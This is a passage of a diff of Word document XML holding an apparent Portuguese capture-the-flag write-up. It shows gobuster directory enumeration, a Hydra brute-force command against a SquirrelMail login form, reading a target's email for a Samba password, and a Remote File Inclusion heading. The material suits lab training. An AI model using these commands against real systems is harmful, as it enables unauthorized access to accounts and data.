-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        <w:t>Comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> gobuster dir -w /usr/share/dirb/wordlists/common.txt -u  http://</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>usado</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>gobuster</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dir</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -w /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/share/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>dirb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/wordlists/common.txt -</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>u  http</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>://</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2486,7 +3183,71 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Após a análise do gobuster, foi possível acessar o “squirrelmail” , o email do nosso alvo.</w:t>
+        <w:t xml:space="preserve">Após a análise do </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>gobuster</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, foi possível acessar o “</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>squirrelmail</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>” ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>email</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> do nosso alvo.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2555,15 +3316,69 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Com o Hydra, o</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> bruteforce vai ser realizado  e também a resposta da primeira pergunta.</w:t>
+        <w:t xml:space="preserve">Com o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Hydra</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>, o</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>bruteforce</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> vai ser </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>realizado  e</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> também a resposta da primeira pergunta.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2575,6 +3390,7 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2584,34 +3400,130 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>Comando usado:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        <w:t>Comando</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> hydra -l mile</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>sdyson -P log1.txt &lt;ip_target&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+        <w:t>usado</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:i/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> http-post-form "/squirrelmail/src/login.php:login_username=^USER^&amp;secretkey=^PASS^&amp;js_autodetect_results=1&amp;just_logged_in=1:Unknown user or password incorrect."</w:t>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> hydra -l </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>mile</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sdyson</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -P log1.txt &lt;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ip_target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> http-post-form "/squirrelmail/src/login.php:login_username=^USER^&amp;secretkey=^PASS^&amp;js_autodetect_results=1&amp;just_logged_in=</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>1:Unknown</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> user or password incorrect."</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2720,7 +3632,43 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Com o acesso ao email, e olhando eles, há um que chama muita atenção. Provavelmente sendo a senha do samba client do Miles.</w:t>
+        <w:t xml:space="preserve">Com o acesso ao </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>email</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, e olhando eles, há um que chama muita atenção. Provavelmente sendo a senha do samba </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>client</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> do Miles.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2810,7 +3758,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>A senha estava correta, agora só dar uma olhada no arquivos e no diretório “notes”</w:t>
+        <w:t xml:space="preserve">A senha estava correta, agora só dar uma olhada </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>no arquivos</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e no diretório “notes”</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2932,7 +3898,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve"> mget importante.txt</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>mget</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> importante.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3145,8 +4129,22 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>Remote File Inclusion</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Remote File </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>Inclusion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3276,7 +4274,85 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> isso, é necessário usar novamente o gobuster, pórem agora com o novo diretório. Achando o “ /administrator”</w:t>
+        <w:t xml:space="preserve"> isso, é necessário usar novamente o </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>gobuster</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>pórem</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> agora com o novo diretório. Achando o </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>“ /</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>administrator”</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3316,6 +4392,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3326,8 +4403,9 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>gobuster dir -w /usr/share/dirb/wordlists</w:t>
-      </w:r>
+        <w:t>gobuster</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -3338,7 +4416,163 @@
           <w:szCs w:val="30"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>/common.txt -u  http://&lt;ip_target&gt;</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>dir</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -w /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>share</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>dirb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
+          <w:spacing w:val="-1"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="30"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>wordlists</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:iCs/>
+          <w:color w:val="242424"/>
